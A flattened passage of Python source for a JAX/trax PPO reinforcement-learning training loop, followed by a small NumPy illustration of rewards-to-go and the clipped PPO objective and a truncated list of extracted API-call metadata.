model_files: return False, policy_and_value_net_params, 0 model_file = sorted(model_files)[-1] model_file_basename = os.path.basename(model_file) # model-??????.pkl i = int(filter(str.isdigit, model_file_basename)) with gfile.GFile(model_file, "rb") as f: policy_and_value_net_params = pickle.load(f) return True, policy_and_value_net_params, i def training_loop( env=None, epochs=EPOCHS, policy_and_value_net_fun=None, policy_and_value_optimizer_fun=None, batch_size=BATCH_TRAJECTORIES, num_optimizer_steps=NUM_OPTIMIZER_STEPS, print_every_optimizer_steps=PRINT_EVERY_OPTIMIZER_STEP, target_kl=0.01, boundary=20, max_timestep=None, max_timestep_eval=20000, random_seed=None, gamma=GAMMA, lambda_=LAMBDA, epsilon=EPSILON, c1=1.0, c2=0.01, output_dir=None, eval_every_n=1000, eval_env=None, done_frac_for_policy_save=0.5, enable_early_stopping=True, env_name=None, ): """Runs the training loop for PPO, with fixed policy and value nets.""" assert env assert output_dir assert env_name gfile.makedirs(output_dir) # Create summary writers and history. train_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "train")) timing_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "timing")) eval_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "eval")) train_sw.text("env_name", env_name) timing_sw.text("env_name", env_name) eval_sw.text("env_name", env_name) jax_rng_key = trax.get_random_number_generator_and_set_seed(random_seed) # Batch Observations Shape = [-1, -1] + OBS, because we will eventually call # policy and value networks on shape [B, T] +_OBS batch_observations_shape = (-1, -1) + env.observation_space.shape assert isinstance(env.action_space, gym.spaces.Discrete) num_actions = env.action_space.n jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) # Initialize the policy and value network. policy_and_value_net_params, policy_and_value_net_apply = ( policy_and_value_net_fun(key1, batch_observations_shape, num_actions)) # Maybe restore the policy params. If there is nothing to restore, then # iteration = 0 and policy_and_value_net_params are returned as is. restore, policy_and_value_net_params, iteration = ( maybe_restore_params(output_dir, policy_and_value_net_params)) if restore: logging.info("Restored parameters from iteration [%d]", iteration) # We should start from the next iteration. iteration += 1 policy_and_value_net_apply = jit(policy_and_value_net_apply) # Initialize the optimizers. 
policy_and_value_optimizer = ( policy_and_value_optimizer_fun(policy_and_value_net_params)) (policy_and_value_opt_state, policy_and_value_opt_update, policy_and_value_get_params) = policy_and_value_optimizer num_trajectories_done = 0 last_saved_at = 0 logging.info("Starting the PPO training loop.") for i in range(iteration, epochs): epoch_start_time = time.time() # Params we'll use to collect the trajectories. policy_and_value_net_params = policy_and_value_get_params( policy_and_value_opt_state) # A function to get the policy and value predictions. def get_predictions(observations, rng=None): """Returns log-probs, value predictions and key back.""" key, key1 = jax_random.split(rng, num=2) log_probs, value_preds = policy_and_value_net_apply( observations, policy_and_value_net_params, rng=key1) return log_probs, value_preds, key # Evaluate the policy. policy_eval_start_time = time.time() if ((i + 1) % eval_every_n == 0) or (i == epochs - 1): jax_rng_key, key = jax_random.split(jax_rng_key, num=2) logging.vlog(1, "Epoch [% 6d] evaluating policy.", i) avg_reward = evaluate_policy( eval_env, get_predictions, boundary, max_timestep=max_timestep_eval, rng=key) for k, v in avg_reward.items(): eval_sw.scalar("eval/mean_reward/%s" % k, v, step=i) logging.info("Epoch [% 6d] Policy Evaluation [%s] = %10.2f", i, k, v) policy_eval_time = get_time(policy_eval_start_time) trajectory_collection_start_time = time.time() logging.vlog(1, "Epoch [% 6d] collecting trajectories.", i) jax_rng_key, key = jax_random.split(jax_rng_key) trajs, num_done = collect_trajectories( env, policy_fun=get_predictions, num_trajectories=batch_size, max_timestep=max_timestep, boundary=boundary, rng=key, reset=(i == 0) or restore, epsilon=(10.0 / (i + 10.0))) # this is a different epsilon. trajectory_collection_time = get_time(trajectory_collection_start_time) logging.vlog(1, "Collecting trajectories took %0.2f msec.", trajectory_collection_time) avg_reward = float(sum(np.sum(traj[2]) for traj in trajs)) / len(trajs) max_reward = max(np.sum(traj[2]) for traj in trajs) min_reward = min(np.sum(traj[2]) for traj in trajs) train_sw.scalar("train/mean_reward", avg_reward, step=i) logging.vlog(1, "Rewards avg=[%0.2f], max=[%0.2f], min=[%0.2f], all=%s", avg_reward, max_reward, min_reward, [float(np.sum(traj[2])) for traj in trajs]) logging.vlog(1, "Trajectory Length average=[%0.2f], max=[%0.2f], min=[%0.2f]", float(sum(len(traj[0]) for traj in trajs)) / len(trajs), max(len(traj[0]) for traj in trajs), min(len(traj[0]) for traj in trajs)) logging.vlog(2, "Trajectory Lengths: %s", [len(traj[0]) for traj in trajs]) padding_start_time = time.time() (_, reward_mask, padded_observations, padded_actions, padded_rewards) = pad_trajectories( trajs, boundary=boundary) padding_time = get_time(padding_start_time) logging.vlog(1, "Padding trajectories took %0.2f msec.", get_time(padding_start_time)) logging.vlog(1, "Padded Observations' shape [%s]", str(padded_observations.shape)) logging.vlog(1, "Padded Actions' shape [%s]", str(padded_actions.shape)) logging.vlog(1, "Padded Rewards' shape [%s]", str(padded_rewards.shape)) # Calculate log-probabilities and value predictions of the trajectories. # We'll pass these to the loss functions so as to not get recomputed. # NOTE: # There is a slight problem here, if the policy network contains # stochasticity in the log-probabilities (ex: dropout), then calculating # these again here is not going to be correct and should be done in the # collect function. 
log_prob_recompute_start_time = time.time() jax_rng_key, key = jax_random.split(jax_rng_key) log_probabs_traj, value_predictions_traj, _ = get_predictions( padded_observations, rng=key) log_prob_recompute_time = get_time(log_prob_recompute_start_time) # Some assertions. B, T = padded_actions.shape # pylint: disable=invalid-name assert (B, T) == padded_rewards.shape assert (B, T) == reward_mask.shape assert (B, T + 1) == padded_observations.shape[:2] assert (B, T + 1) + env.observation_space.shape == padded_observations.shape # Linear annealing from 0.1 to 0.0 # epsilon_schedule = epsilon if epochs == 1 else epsilon * (1.0 - # (i / # (epochs - 1))) # Constant epsilon. epsilon_schedule = epsilon # Compute value and ppo losses. jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) logging.vlog(2, "Starting to compute P&V loss.") loss_compute_start_time = time.time() cur_combined_loss, cur_ppo_loss, cur_value_loss, entropy_bonus = ( combined_loss( policy_and_value_net_params, log_probabs_traj, value_predictions_traj, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, c1=c1, c2=c2, rng=key1)) loss_compute_time = get_time(loss_compute_start_time) logging.vlog( 1, "Calculating P&V loss [%10.2f(%10.2f, %10.2f, %10.2f)] took %0.2f msec.", cur_combined_loss, cur_value_loss, cur_ppo_loss, entropy_bonus, get_time(loss_compute_start_time)) jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) logging.vlog(1, "Policy and Value Optimization") optimization_start_time = time.time() keys = jax_random.split(key1, num=num_optimizer_steps) for j in range(num_optimizer_steps): k1, k2, k3 = jax_random.split(keys[j], num=3) t = time.time() # Update the optimizer state. policy_and_value_opt_state = policy_and_value_opt_step( j, policy_and_value_opt_state, policy_and_value_opt_update, policy_and_value_get_params, policy_and_value_net_apply, log_probabs_traj, value_predictions_traj, padded_observations, padded_actions, padded_rewards, reward_mask, c1=c1, c2=c2, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, rng=k1) # Compute the approx KL for early stopping. new_policy_and_value_net_params = policy_and_value_get_params( policy_and_value_opt_state) log_probab_actions_new, _ = policy_and_value_net_apply( padded_observations, new_policy_and_value_net_params, rng=k2) approx_kl = approximate_kl(log_probab_actions_new, log_probabs_traj, reward_mask) early_stopping = enable_early_stopping and approx_kl > 1.5 * target_kl if early_stopping: logging.vlog( 1, "Early stopping policy and value optimization at iter: %d, " "with approx_kl: %0.2f", j, approx_kl) # We don't return right-away, we want the below to execute on the last # iteration. t2 = time.time() if (((j + 1) % print_every_optimizer_steps == 0) or (j == num_optimizer_steps - 1) or early_stopping): # Compute and log the loss. 
(loss_combined, loss_ppo, loss_value, entropy_bonus) = ( combined_loss( new_policy_and_value_net_params, log_probabs_traj, value_predictions_traj, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, c1=c1, c2=c2, rng=k3)) logging.vlog(1, "One Policy and Value grad desc took: %0.2f msec", get_time(t, t2)) logging.vlog( 1, "Combined Loss(value, ppo, entropy_bonus) [%10.2f] ->" " [%10.2f(%10.2f,%10.2f,%10.2f)]", cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus) if early_stopping: break optimization_time = get_time(optimization_start_time) logging.vlog( 1, "Total Combined Loss reduction [%0.2f]%%", (100 * (cur_combined_loss - loss_combined) / np.abs(cur_combined_loss))) # Save parameters every time we see the end of at least a fraction of batch # number of trajectories that are done (not completed -- completed includes # truncated and done). # Also don't save too frequently, enforce a minimum gap. # Or if this is the last iteration. policy_save_start_time = time.time() num_trajectories_done += num_done if (((num_trajectories_done >= done_frac_for_policy_save * batch_size) and (i - last_saved_at > eval_every_n)) or (i == epochs - 1)): logging.vlog(1, "Epoch [% 6d] saving model.", i) params_file = os.path.join(output_dir, "model-%06d.pkl" % i) with gfile.GFile(params_file, "wb") as f: pickle.dump(policy_and_value_net_params, f) # Reset this number. num_trajectories_done = 0 last_saved_at = i policy_save_time = get_time(policy_save_start_time) epoch_time = get_time(epoch_start_time) logging.info( "Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined" " Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]", i, min_reward, max_reward, avg_reward, loss_combined, loss_value, loss_ppo, entropy_bonus) timing_dict = { "epoch": epoch_time, "policy_eval": policy_eval_time, "trajectory_collection": trajectory_collection_time, "padding": padding_time, "log_prob_recompute": log_prob_recompute_time, "loss_compute": loss_compute_time, "optimization": optimization_time, "policy_save": policy_save_time, } for k, v in timing_dict.items(): timing_sw.scalar("timing/%s" % k, v, step=i) max_key_len = max(len(k) for k in timing_dict) timing_info_list = [ "%s : % 10.2f" % (k.rjust(max_key_len + 1), v) for k, v in sorted(timing_dict.items()) ] logging.info("Epoch [% 6d], Timings: \n%s", i, "\n".join(timing_info_list)) # Reset restore. restore = False # Flush summary writers once in a while. if (i+1) % 1000 == 0 or i == epochs - 1: train_sw.flush() timing_sw.flush() eval_sw.flush()
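The docstrings in the file above define masked rewards-to-go, GAE-style discounting and the clipped PPO objective in terms of (B, T) arrays. The short sketch below re-derives the two core computations in plain NumPy on toy inputs, purely as an illustration: the function names rewards_to_go_np and clipped_ppo_objective, and all of the numbers, are inventions of this note and not part of the repository above.

# Illustrative sketch only -- not part of the source file above.
import numpy as np


def rewards_to_go_np(rewards, mask, gamma=0.99):
  """Masked, discounted reward-to-go; rewards and mask are (B, T)."""
  masked = rewards * mask
  out = np.zeros_like(masked)
  running = np.zeros(rewards.shape[0])
  for t in reversed(range(rewards.shape[1])):
    running = masked[:, t] + gamma * running  # accumulate from the last step backwards
    out[:, t] = running
  return out


def clipped_ppo_objective(ratios, advantages, mask, epsilon=0.2):
  """min(r * A, clip(r, 1 - eps, 1 + eps) * A), averaged over unmasked steps."""
  clipped = np.clip(ratios, 1.0 - epsilon, 1.0 + epsilon)
  objective = np.minimum(ratios * advantages, clipped * advantages) * mask
  return objective.sum() / mask.sum()


rewards = np.array([[1.0, 0.0, 2.0], [0.5, 0.5, 0.0]])
mask = np.array([[1.0, 1.0, 1.0], [1.0, 1.0, 0.0]])  # second trajectory ends one step early
print(rewards_to_go_np(rewards, mask))

ratios = np.array([[1.1, 0.7, 1.4], [0.9, 1.3, 1.0]])
advantages = np.array([[0.5, -0.2, 1.0], [0.1, 0.4, 0.0]])
print(clipped_ppo_objective(ratios, advantages, mask))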
[((576, 1, 576, 44), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((611, 1, 611, 49), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((121, 8, 121, 71), 'tensor2tensor.trax.optimizers.Adam', 'trax_opt.Adam', (), '', True, 'from tensor2tensor.trax import optimizers as trax_opt\n'), ((170, 9, 179, 14), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (), '', False, 'from tensor2tensor.envs import env_problem_utils\n'), ((355, 21, 355, 57), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((479, 9, 479, 57), 'jax.numpy.clip', 'np.clip', ({(479, 17, 479, 30): 'probab_ratios', (479, 32, 479, 43): '(1 - epsilon)', (479, 45, 479, 56): '(1 + epsilon)'}, {}), '(probab_ratios, 1 - epsilon, 1 + epsilon)', True, 'from jax import numpy as np\n'), ((743, 24, 743, 52), 'os.path.basename', 'os.path.basename', ({(743, 41, 743, 51): 'model_file'}, {}), '(model_file)', False, 'import os\n'), ((780, 2, 780, 28), 'tensorflow.io.gfile.makedirs', 'gfile.makedirs', ({(780, 17, 780, 27): 'output_dir'}, {}), '(output_dir)', False, 'from tensorflow.io import gfile\n'), ((791, 16, 791, 74), 'tensor2tensor.trax.trax.get_random_number_generator_and_set_seed', 'trax.get_random_number_generator_and_set_seed', ({(791, 62, 791, 73): 'random_seed'}, {}), '(random_seed)', False, 'from tensor2tensor.trax import trax\n'), ((800, 22, 800, 58), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((816, 31, 816, 62), 'jax.jit', 'jit', ({(816, 35, 816, 61): 'policy_and_value_net_apply'}, {}), '(policy_and_value_net_apply)', False, 'from jax import jit\n'), ((827, 2, 827, 49), 'absl.logging.info', 'logging.info', ({(827, 15, 827, 48): '"""Starting the PPO training loop."""'}, {}), "('Starting the PPO training loop.')", False, 'from absl import logging\n'), ((104, 10, 104, 31), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(104, 24, 104, 30): '*tower'}, {}), '(*tower)', False, 'from tensor2tensor.trax import layers\n'), ((191, 20, 191, 31), 'jax.numpy.uint8', 'np.uint8', ({(191, 29, 191, 30): '0'}, {}), '(0)', True, 'from jax import numpy as np\n'), ((256, 17, 256, 58), 'jax.lax.pad', 'lax.pad', ({(256, 25, 256, 26): 'o', (256, 28, 256, 41): 'padding_value', (256, 43, 256, 57): 'padding_config'}, {}), '(o, padding_value, padding_config)', False, 'from jax import lax\n'), ((263, 20, 263, 68), 'jax.lax.pad', 'lax.pad', ({(263, 28, 263, 29): 'a', (263, 31, 263, 51): 'action_padding_value', (263, 53, 263, 67): 'padding_config'}, {}), '(a, action_padding_value, padding_config)', False, 'from jax import lax\n'), ((265, 20, 265, 68), 'jax.lax.pad', 'lax.pad', ({(265, 28, 265, 29): 'r', (265, 31, 265, 51): 'reward_padding_value', (265, 53, 265, 67): 'padding_config'}, {}), '(r, reward_padding_value, padding_config)', False, 'from jax import lax\n'), ((269, 18, 269, 50), 'numpy.ones_like', 'onp.ones_like', (), '', True, 'import numpy as onp\n'), ((272, 25, 272, 47), 'jax.numpy.stack', 'np.stack', ({(272, 34, 272, 46): 'reward_masks'}, {}), '(reward_masks)', True, 'from jax import numpy as np\n'), ((272, 49, 273, 26), 'jax.numpy.stack', 'np.stack', ({(273, 6, 273, 25): 'padded_observations'}, {}), '(padded_observations)', True, 'from jax import numpy as np\n'), ((273, 28, 273, 52), 'jax.numpy.stack', 'np.stack', ({(273, 37, 273, 51): 'padded_actions'}, {}), '(padded_actions)', True, 'from jax import numpy as np\n'), 
((273, 54, 273, 78), 'jax.numpy.stack', 'np.stack', ({(273, 63, 273, 77): 'padded_rewards'}, {}), '(padded_rewards)', True, 'from jax import numpy as np\n'), ((325, 17, 325, 39), 'jax.numpy.stack', 'np.stack', (), '', True, 'from jax import numpy as np\n'), ((362, 27, 362, 67), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((368, 11, 368, 43), 'jax.numpy.maximum', 'np.maximum', ({(368, 22, 368, 36): 'v_clipped_loss', (368, 38, 368, 42): 'loss'}, {}), '(v_clipped_loss, loss)', True, 'from jax import numpy as np\n'), ((371, 9, 371, 21), 'jax.numpy.sum', 'np.sum', ({(371, 16, 371, 20): 'loss'}, {}), '(loss)', True, 'from jax import numpy as np\n'), ((371, 24, 371, 43), 'jax.numpy.sum', 'np.sum', ({(371, 31, 371, 42): 'reward_mask'}, {}), '(reward_mask)', True, 'from jax import numpy as np\n'), ((473, 18, 473, 45), 'jax.numpy.exp', 'np.exp', ({(473, 25, 473, 44): '(logp_new - logp_old)'}, {}), '(logp_new - logp_old)', True, 'from jax import numpy as np\n'), ((511, 6, 511, 47), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((521, 52, 521, 70), 'jax.numpy.std', 'np.std', ({(521, 59, 521, 69): 'advantages'}, {}), '(advantages)', True, 'from jax import numpy as np\n'), ((534, 22, 534, 39), 'jax.numpy.sum', 'np.sum', ({(534, 29, 534, 38): 'objective'}, {}), '(objective)', True, 'from jax import numpy as np\n'), ((534, 42, 534, 61), 'jax.numpy.sum', 'np.sum', ({(534, 49, 534, 60): 'reward_mask'}, {}), '(reward_mask)', True, 'from jax import numpy as np\n'), ((652, 6, 652, 33), 'jax.grad', 'grad', ({(652, 11, 652, 32): 'policy_and_value_loss'}, {}), '(policy_and_value_loss)', False, 'from jax import grad\n'), ((659, 9, 659, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((680, 9, 680, 21), 'jax.numpy.sum', 'np.sum', ({(680, 16, 680, 20): 'diff'}, {}), '(diff)', True, 'from jax import numpy as np\n'), ((680, 24, 680, 36), 'jax.numpy.sum', 'np.sum', ({(680, 31, 680, 35): 'mask'}, {}), '(mask)', True, 'from jax import numpy as np\n'), ((697, 6, 697, 16), 'jax.numpy.exp', 'np.exp', ({(697, 13, 697, 15): 'lp'}, {}), '(lp)', True, 'from jax import numpy as np\n'), ((714, 15, 721, 16), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (), '', False, 'from tensor2tensor.envs import env_problem_utils\n'), ((738, 27, 738, 71), 'os.path.join', 'os.path.join', ({(738, 40, 738, 50): 'output_dir', (738, 52, 738, 70): '"""model-??????.pkl"""'}, {}), "(output_dir, 'model-??????.pkl')", False, 'import os\n'), ((745, 7, 745, 36), 'tensorflow.io.gfile.GFile', 'gfile.GFile', ({(745, 19, 745, 29): 'model_file', (745, 31, 745, 35): '"""rb"""'}, {}), "(model_file, 'rb')", False, 'from tensorflow.io import gfile\n'), ((746, 34, 746, 48), 'pickle.load', 'pickle.load', ({(746, 46, 746, 47): 'f'}, {}), '(f)', False, 'import pickle\n'), ((783, 36, 783, 69), 'os.path.join', 'os.path.join', ({(783, 49, 783, 59): 'output_dir', (783, 61, 783, 68): '"""train"""'}, {}), "(output_dir, 'train')", False, 'import os\n'), ((784, 37, 784, 71), 'os.path.join', 'os.path.join', ({(784, 50, 784, 60): 'output_dir', (784, 62, 784, 70): '"""timing"""'}, {}), "(output_dir, 'timing')", False, 'import os\n'), ((785, 35, 785, 67), 'os.path.join', 'os.path.join', ({(785, 48, 785, 58): 'output_dir', (785, 60, 785, 66): '"""eval"""'}, {}), "(output_dir, 'eval')", False, 'import os\n'), ((812, 4, 812, 70), 'absl.logging.info', 'logging.info', ({(812, 17, 812, 58): '"""Restored parameters 
from iteration [%d]"""', (812, 60, 812, 69): 'iteration'}, {}), "('Restored parameters from iteration [%d]', iteration)", False, 'from absl import logging\n'), ((829, 23, 829, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((846, 29, 846, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((863, 39, 863, 50), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((864, 4, 864, 63), 'absl.logging.vlog', 'logging.vlog', ({(864, 17, 864, 18): '(1)', (864, 20, 864, 59): '"""Epoch [% 6d] collecting trajectories."""', (864, 61, 864, 62): 'i'}, {}), "(1, 'Epoch [% 6d] collecting trajectories.', i)", False, 'from absl import logging\n'), ((865, 23, 865, 52), 'jax.random.split', 'jax_random.split', ({(865, 40, 865, 51): 'jax_rng_key'}, {}), '(jax_rng_key)', True, 'from jax import random as jax_random\n'), ((877, 4, 878, 44), 'absl.logging.vlog', 'logging.vlog', ({(877, 17, 877, 18): '(1)', (877, 20, 877, 62): '"""Collecting trajectories took %0.2f msec."""', (878, 17, 878, 43): 'trajectory_collection_time'}, {}), "(1, 'Collecting trajectories took %0.2f msec.',\n trajectory_collection_time)", False, 'from absl import logging\n'), ((897, 25, 897, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((919, 36, 919, 47), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((920, 23, 920, 52), 'jax.random.split', 'jax_random.split', ({(920, 40, 920, 51): 'jax_rng_key'}, {}), '(jax_rng_key)', True, 'from jax import random as jax_random\n'), ((941, 24, 941, 60), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((942, 4, 942, 52), 'absl.logging.vlog', 'logging.vlog', ({(942, 17, 942, 18): '(2)', (942, 20, 942, 51): '"""Starting to compute P&V loss."""'}, {}), "(2, 'Starting to compute P&V loss.')", False, 'from absl import logging\n'), ((943, 30, 943, 41), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((967, 24, 967, 60), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((968, 4, 968, 52), 'absl.logging.vlog', 'logging.vlog', ({(968, 17, 968, 18): '(1)', (968, 20, 968, 51): '"""Policy and Value Optimization"""'}, {}), "(1, 'Policy and Value Optimization')", False, 'from absl import logging\n'), ((969, 30, 969, 41), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((970, 11, 970, 58), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((1053, 29, 1053, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1068, 4, 1072, 22), 'absl.logging.info', 'logging.info', ({(1069, 8, 1070, 63): '"""Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]"""', (1070, 65, 1070, 66): 'i', (1070, 68, 1070, 78): 'min_reward', (1071, 8, 1071, 18): 'max_reward', (1071, 20, 1071, 30): 'avg_reward', (1071, 32, 1071, 45): 'loss_combined', (1071, 47, 1071, 57): 'loss_value', (1071, 59, 1071, 67): 'loss_ppo', (1072, 8, 1072, 21): 'entropy_bonus'}, {}), "(\n 'Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]'\n , i, min_reward, max_reward, avg_reward, loss_combined, loss_value,\n loss_ppo, entropy_bonus)", False, 'from absl import logging\n'), ((113, 8, 113, 30), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(113, 22, 113, 29): '*tower1'}, {}), '(*tower1)', False, 'from tensor2tensor.trax import 
layers\n'), ((114, 8, 114, 30), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(114, 22, 114, 29): '*tower2'}, {}), '(*tower2)', False, 'from tensor2tensor.trax import layers\n'), ((193, 20, 193, 32), 'jax.numpy.uint16', 'np.uint16', ({(193, 30, 193, 31): '0'}, {}), '(0)', True, 'from jax import numpy as np\n'), ((270, 24, 270, 63), 'jax.lax.pad', 'lax.pad', ({(270, 32, 270, 43): 'reward_mask', (270, 45, 270, 46): '(0)', (270, 48, 270, 62): 'padding_config'}, {}), '(reward_mask, 0, padding_config)', False, 'from jax import lax\n'), ((365, 39, 366, 67), 'jax.numpy.clip', 'np.clip', ({(366, 8, 366, 47): '(value_prediction - value_prediction_old)', (366, 49, 366, 57): '(-epsilon)', (366, 59, 366, 66): 'epsilon'}, {}), '(value_prediction - value_prediction_old, -epsilon, epsilon)', True, 'from jax import numpy as np\n'), ((400, 9, 400, 20), 'jax.numpy.array', 'np.array', ({(400, 18, 400, 19): 'd'}, {}), '(d)', True, 'from jax import numpy as np\n'), ((521, 29, 521, 48), 'jax.numpy.mean', 'np.mean', ({(521, 37, 521, 47): 'advantages'}, {}), '(advantages)', True, 'from jax import numpy as np\n'), ((699, 11, 699, 25), 'jax.numpy.sum', 'np.sum', ({(699, 18, 699, 24): '(lp * p)'}, {}), '(lp * p)', True, 'from jax import numpy as np\n'), ((699, 28, 699, 40), 'jax.numpy.sum', 'np.sum', ({(699, 35, 699, 39): 'mask'}, {}), '(mask)', True, 'from jax import numpy as np\n'), ((838, 18, 838, 46), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((848, 25, 848, 61), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((850, 6, 850, 59), 'absl.logging.vlog', 'logging.vlog', ({(850, 19, 850, 20): '(1)', (850, 22, 850, 55): '"""Epoch [% 6d] evaluating policy."""', (850, 57, 850, 58): 'i'}, {}), "(1, 'Epoch [% 6d] evaluating policy.', i)", False, 'from absl import logging\n'), ((972, 19, 972, 51), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((973, 10, 973, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1012, 11, 1012, 22), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1057, 6, 1057, 54), 'absl.logging.vlog', 'logging.vlog', ({(1057, 19, 1057, 20): '(1)', (1057, 22, 1057, 50): '"""Epoch [% 6d] saving model."""', (1057, 52, 1057, 53): 'i'}, {}), "(1, 'Epoch [% 6d] saving model.', i)", False, 'from absl import logging\n'), ((1058, 20, 1058, 66), 'os.path.join', 'os.path.join', ({(1058, 33, 1058, 43): 'output_dir', (1058, 45, 1058, 65): "'model-%06d.pkl' % i"}, {}), "(output_dir, 'model-%06d.pkl' % i)", False, 'import os\n'), ((109, 19, 109, 44), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(109, 32, 109, 43): 'num_actions'}, {}), '(num_actions)', False, 'from tensor2tensor.trax import layers\n'), ((109, 46, 109, 65), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ({}, {}), '()', False, 'from tensor2tensor.trax import layers\n'), ((110, 19, 110, 34), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(110, 32, 110, 33): '(1)'}, {}), '(1)', False, 'from tensor2tensor.trax import layers\n'), ((243, 26, 243, 58), 'numpy.ones_like', 'onp.ones_like', (), '', True, 'import numpy as onp\n'), ((442, 52, 442, 64), 'jax.numpy.arange', 'np.arange', ({(442, 62, 442, 63): 'T'}, {}), '(T)', True, 'from jax import numpy as np\n'), ((860, 8, 860, 77), 'absl.logging.info', 'logging.info', ({(860, 21, 860, 67): '"""Epoch [% 6d] Policy Evaluation [%s] = %10.2f"""', (860, 69, 860, 70): 'i', (860, 72, 860, 73): 
'k', (860, 75, 860, 76): 'v'}, {}), "('Epoch [% 6d] Policy Evaluation [%s] = %10.2f', i, k, v)", False, 'from absl import logging\n'), ((881, 21, 881, 36), 'jax.numpy.sum', 'np.sum', ({(881, 28, 881, 35): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((882, 21, 882, 36), 'jax.numpy.sum', 'np.sum', ({(882, 28, 882, 35): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((1006, 8, 1008, 50), 'absl.logging.vlog', 'logging.vlog', ({(1007, 12, 1007, 13): '(1)', (1007, 15, 1008, 35): '"""Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f"""', (1008, 37, 1008, 38): 'j', (1008, 40, 1008, 49): 'approx_kl'}, {}), "(1,\n 'Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f'\n , j, approx_kl)", False, 'from absl import logging\n'), ((1034, 8, 1037, 48), 'absl.logging.vlog', 'logging.vlog', ({(1035, 12, 1035, 13): '(1)', (1035, 15, 1036, 45): '"""Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]"""', (1036, 47, 1036, 64): 'cur_combined_loss', (1036, 66, 1036, 79): 'loss_combined', (1037, 12, 1037, 22): 'loss_value', (1037, 24, 1037, 32): 'loss_ppo', (1037, 34, 1037, 47): 'entropy_bonus'}, {}), "(1,\n 'Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]'\n , cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus)", False, 'from absl import logging\n'), ((1046, 53, 1046, 78), 'jax.numpy.abs', 'np.abs', ({(1046, 60, 1046, 77): 'cur_combined_loss'}, {}), '(cur_combined_loss)', True, 'from jax import numpy as np\n'), ((1059, 11, 1059, 41), 'tensorflow.io.gfile.GFile', 'gfile.GFile', ({(1059, 23, 1059, 34): 'params_file', (1059, 36, 1059, 40): '"""wb"""'}, {}), "(params_file, 'wb')", False, 'from tensorflow.io import gfile\n'), ((1060, 8, 1060, 51), 'pickle.dump', 'pickle.dump', ({(1060, 20, 1060, 47): 'policy_and_value_net_params', (1060, 49, 1060, 50): 'f'}, {}), '(policy_and_value_net_params, f)', False, 'import pickle\n'), ((102, 12, 102, 27), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(102, 25, 102, 26): '(1)'}, {}), '(1)', False, 'from tensor2tensor.trax import layers\n'), ((442, 29, 442, 41), 'jax.numpy.arange', 'np.arange', ({(442, 39, 442, 40): 'B'}, {}), '(B)', True, 'from jax import numpy as np\n'), ((888, 24, 888, 39), 'jax.numpy.sum', 'np.sum', ({(888, 31, 888, 38): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((101, 26, 101, 51), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(101, 